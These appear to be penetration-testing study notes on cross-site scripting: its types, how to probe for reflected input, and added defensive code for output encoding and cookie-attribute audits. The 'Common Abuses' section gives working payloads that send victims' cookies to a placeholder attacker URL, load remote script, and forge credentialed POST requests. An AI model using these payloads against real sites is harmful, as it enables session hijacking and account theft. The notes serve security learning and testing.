Cross-Site Scripting

This attack is possible due to unsanitized input being displayed on a web page.

Stored XSS

This occurs when the payload is stored or otherwise cached by the server.

Reflected XSS

The web application displays the value given but does not store it. Websites frequently do this with search features. These attacks only affect the person submitting the request, so the payload is usually sent to a victim as a link.

DOM-Based XSS

Takes place within the page's Document Object Model: client-side JavaScript takes attacker-controlled data (for example from the URL fragment) and writes it into the page, so the payload may never reach the server. I am really foggy on this one...

Identifying XSS

Look for input that is reflected on the site. If you find user-controlled input displayed on the site, check whether special characters are sanitized or whether they are being interpreted as markup.

When looking for where the input is displayed, consider that it may only get displayed to someone else. For example, if you submit a help ticket, the XSS may happen in the helpdesk technician's browser and cannot be viewed by anyone else.

Also be sure to check around the site for where your text may be displayed. Use unique text and document where you submitted it, so that if you come across it later you know where it came from.

One method to check is to try HTML tags such as the H1 tag <h1>Some Text</h1> to see if it gets rendered or not. You may also want to try to create an alert box using JavaScript: <script>alert('BOOM')</script>.
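The check above, written out as code. This is an added example, not part of the original notes: a deliberately vulnerable search template that reflects the query verbatim next to the fixed version that HTML-encodes it, plus a small classifier that reports whether a probe came back "interpreted" (live markup), "encoded" (sanitized) or not reflected at all. The two probe strings are the ones the section suggests; the template names and the escapeHtml helper are assumptions for this example.

```javascript
// Added example: output encoding versus verbatim reflection, and the tester's
// "is it interpreted or sanitized?" check as a function.

// Minimal HTML-body encoder: the five characters that can break out of text
// context. The apostrophe is encoded as &#39; so the same function is also
// safe inside quoted attribute values.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[ch]);
}

// Vulnerable "search results" template (hypothetical): reflects the query as-is.
function renderSearchUnsafe(query) {
  return `<p>Results for: ${query}</p>`;
}

// Fixed template: the same page with the query encoded before insertion.
function renderSearchSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Classify how a probe came back: "interpreted" if the raw markup is present,
// "encoded" if only its escaped form is present, otherwise "not reflected".
function classifyReflection(page, probe) {
  if (page.includes(probe)) return 'interpreted';
  if (page.includes(escapeHtml(probe))) return 'encoded';
  return 'not reflected';
}

// Constructed probe strings, the same two suggested in the notes above.
const PROBES = ['<h1>Some Text</h1>', "<script>alert('BOOM')</script>"];

// Run both templates against every probe and report the outcome.
function runChecks() {
  return PROBES.map((probe) => ({
    probe,
    unsafe: classifyReflection(renderSearchUnsafe(probe), probe),
    safe: classifyReflection(renderSearchSafe(probe), probe),
  }));
}

console.table(runChecks());
```

Note that escapeHtml is only correct for HTML body and quoted-attribute context; a value placed inside a script block, a URL or a CSS rule needs encoding for that context instead.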

Common Abuses

Stealing Cookies

<script>
    new Image().src="http://<YOUR URL>/cool.jpg?giveMe="+document.cookie
</script>
<img src=x onerror=this.src='http://<YOUR URL>/?cookies='+btoa(document.cookie) />

btoa will convert the cookie to base64.

With this injected into a site with XSS, you just wait for a connection, which hopefully will carry an authenticated session cookie.
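The payloads above only work if the session cookie is readable from document.cookie, so the first thing to check on the defending side is the cookie's attributes. The following is an added example, not from the original notes: a small Set-Cookie parser and an audit that flags a session cookie missing HttpOnly (readable by injected script), Secure (sent over plain HTTP) or a SameSite value (sent on cross-site requests). The sample headers and the list of session cookie names are constructed for the example.

```javascript
// Added example: audit Set-Cookie headers for the attributes that limit what
// an injected script can do with a session cookie.

// Parse one Set-Cookie header value into { name, value, attributes }.
// Attribute keys are lower-cased; flag attributes (HttpOnly, Secure) map to true.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const value = eq === -1 ? '' : pair.slice(eq + 1);
  const attributes = {};
  for (const attr of attrs) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    attributes[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return { name, value, attributes };
}

// Constructed list of common session cookie names (assumption for this example).
const SESSION_NAMES = ['sessionid', 'phpsessid', 'jsessionid', 'connect.sid'];

// Return a list of findings for one cookie; an empty list means nothing to flag.
function auditCookie(header, sessionNames = SESSION_NAMES) {
  const c = parseSetCookie(header);
  const findings = [];
  const isSession = sessionNames.includes(c.name.toLowerCase());
  if (isSession && !c.attributes.httponly) {
    findings.push(`${c.name}: missing HttpOnly (readable via document.cookie)`);
  }
  if (!c.attributes.secure) {
    findings.push(`${c.name}: missing Secure (sent over plain HTTP)`);
  }
  const sameSite = String(c.attributes.samesite || '').toLowerCase();
  if (!sameSite || sameSite === 'none') {
    findings.push(`${c.name}: SameSite absent or None (sent on cross-site requests)`);
  }
  return findings;
}

// Constructed sample headers, as a server might emit them.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/',
  'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/; Secure; SameSite=Strict',
];

// Audit every header and pair each with its findings.
function auditAll(headers = SAMPLE_HEADERS) {
  return headers.map((h) => ({ header: h, findings: auditCookie(h) }));
}

console.log(JSON.stringify(auditAll(), null, 2));
```

HttpOnly stops the document.cookie read but not everything an injected script can do: it can still issue requests with the browser's cookies attached, which is the point of the POST payload further down.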

Running JavaScript from Attacker Machine

If you can set up an XSS payload that reaches another system you control, you can load and run a JavaScript file in the victim's browser.

<script src=http://URL/script.js></script>

Run POST Request from Target Client

Create a JavaScript file to host that will send a POST request from the target machine.

var xhr = new XMLHttpRequest();
var url = "http://TARGET-URL";
var params = "PARAMS TO BE SENT";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(params);

Client-Side Attacks

Redirects

Phishing

Key Logger

Tools

BeEF